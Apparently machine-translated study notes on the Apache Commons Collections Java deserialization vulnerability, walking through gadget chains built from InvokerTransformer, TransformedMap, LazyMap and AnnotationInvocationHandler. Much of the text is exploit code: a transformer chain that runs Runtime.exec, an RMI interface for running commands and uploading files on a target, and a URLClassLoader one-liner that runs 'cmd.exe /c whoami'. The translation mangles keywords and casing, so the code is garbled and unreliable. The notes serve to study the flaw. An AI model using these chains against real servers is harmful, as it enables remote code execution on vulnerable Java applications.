Ui.class->getshellwl.connect (Host, Port);
is the deserialized class
Create our remote class, implement two methods in the class, execute the system command to get echo and upload the text file, the class must inherit the Java.rmi.Remote interface, the code is as follows:
Interface:
Public interface Initapp extends Java.rmi.Remote {
String Runcmd (string cmd);
String Putfile (String content,string Path);
}
Post-upload and register
byte[] Payload = Genpayload.gen ("Windows", b);
Sendpayload.send (Host, Port, Payload);
The Getoutputstream method is used to return the byte output stream object created by the servlet engine, which can output the response body in bytes.
=============================================================================================================== ============================
byte[] Payload = First_payload.gen_firstpayload ("Windows");
Transformer[] Transformers = {} exploit
Upload binary code
Upload to the current directory that the program is running under, a sentence code: New FileOutputStream ("./payload.class"). Write (New byte[]{0xxx,0xxx,......})
The following code executes a sentence:
Java.net.URLClassLoader.getConstructor (Java.net.url[].class). newinstance (New java.net.url[] {new Java.net.URL (" File:./")}). LoadClass (" payload "). Newinstance (" cmd.exe/c whoami ")
=============================================================================================================== ==============================
Key functions Java Reflection mechanism:
GetClass ()
Clz.getmethod ("foo", String.class)
Test code:
@SuppressWarnings ({"Rawtypes", "Unchecked"})
public class Vultest {
public static void Main (string[] args) {
Transformer transform = new Invokertransformer (//invokertransformer object, called transform
"Append",
New Class[]{string.class},
New object[]{"Exploitcat"});
Object newObject = transform.transform (New StringBuffer ("Your name is");
System.out.println (NewObject);
}
}
Test Code 1:
public class Transformtest {
public static void Main (string[] args) {
Transformer[] Transformers = new transformer[]{
New Constanttransformer (Runtime.class),//Green league is Java.net.URLClassLoader.class
New Invokertransformer ("GetMethod", New Class[]{string.class,class[].class},//green league is getconstructor; The Java.lang.Class.getConstructor () method returns a constructor object
New object[]{"GetRuntime", New Class[0]}),//Green league is Newinstance
New Invokertransformer ("Invoke", New Class[]{object.class,object[].class},//Green league is LoadClass
New Object[]{null, New Object[0]}),
New Invokertransformer ("Exec", New Class[]{string.class},//Green league is GetMethod
New object[]{"Calc"})
};
The Green League has another invoke.
Transformer chain = new Chainedtransformer (Transformers);
Map Innermap = new HashMap ();
Innermap.put ("name", "Hello");
Map Outermap = transformedmap.decorate (Innermap, NULL, chain); Decorate method
Map.entry elentry = (Entry) outermap.entryset (). iterator (). Next ();
Elentry.setvalue ("Hello"); The checksetvalue that is executed when the entry object calls SetValue. As for why? You just know, SetValue need checksetvalue before ... Just look at the name. For example, PHP login () will call Checklogin () to judge, sometimes in a different way to understand the next 2333.
}
}
Calling these transform methods is a decorate method of a class called Transformedmap.
Look at the decorate method.
public static map decorate (map map, Transformer Keytransformer, Transformer valuetransformer) {
return new Transformedmap (map, Keytransformer, Valuetransformer);
}
Parsing: The first is the map object->innermap; second not know, the third transformer->chain (should be key/value inside the value)
=====================================================================================================
Invokertransformer transform has a problem.
Two vulnerabilities triggered:
Transformedmap Checksetvalue (Object) trigger
Lazymap.get (Object) trigger
Sun.reflect.annotation.AnnotationInvocationHandler
Lazymap.get:
Do not confirm whether to: Lazymap.get->transformedmap.decorate->sun.reflect.annotation.annotationinvocationhandler
An object is a class that is instantiated
Article statement:
Here you should be able to understand why foreigners use dynamic agents to construct POC.
Because Annotationinvocationhandler implements the Invocationhandler interface by default
After generating a dynamic agent with Object Iswin=proxy.newinstance (Classloader,interface,invocationhandler)
The Invocationhandler.invoke (xx) method is called when the object Iswin is making an object call
So the POC execution process is map.xx->proxy (map). Invoke->lazymap.get (XX) triggers the transform method to execute malicious code.
Here Chainedtransformer for the chain of Transformer, will execute our definition of Transformer, here is relatively simple, interested in their own to see the source know.
Transformedmap Checksetvalue:
The article says
So here the POC execution process is Transformedmap, Annotationinvocationhandler.readobject (), SetValue (), Checksetvalue () The vulnerability was successfully triggered.
Checksetvalue and SetValue
http://drops.wooyun.org/papers/10467
http://blog.nsfocus.net/java-deserialization-vulnerability-overlooked-mass-destruction/
https://www.iswin.org/2015/11/13/Apache-CommonsCollections-Deserialized-Vulnerability/
20160509-one time to clean up the Java Apache Commons the Anti-serialization vulnerability principle
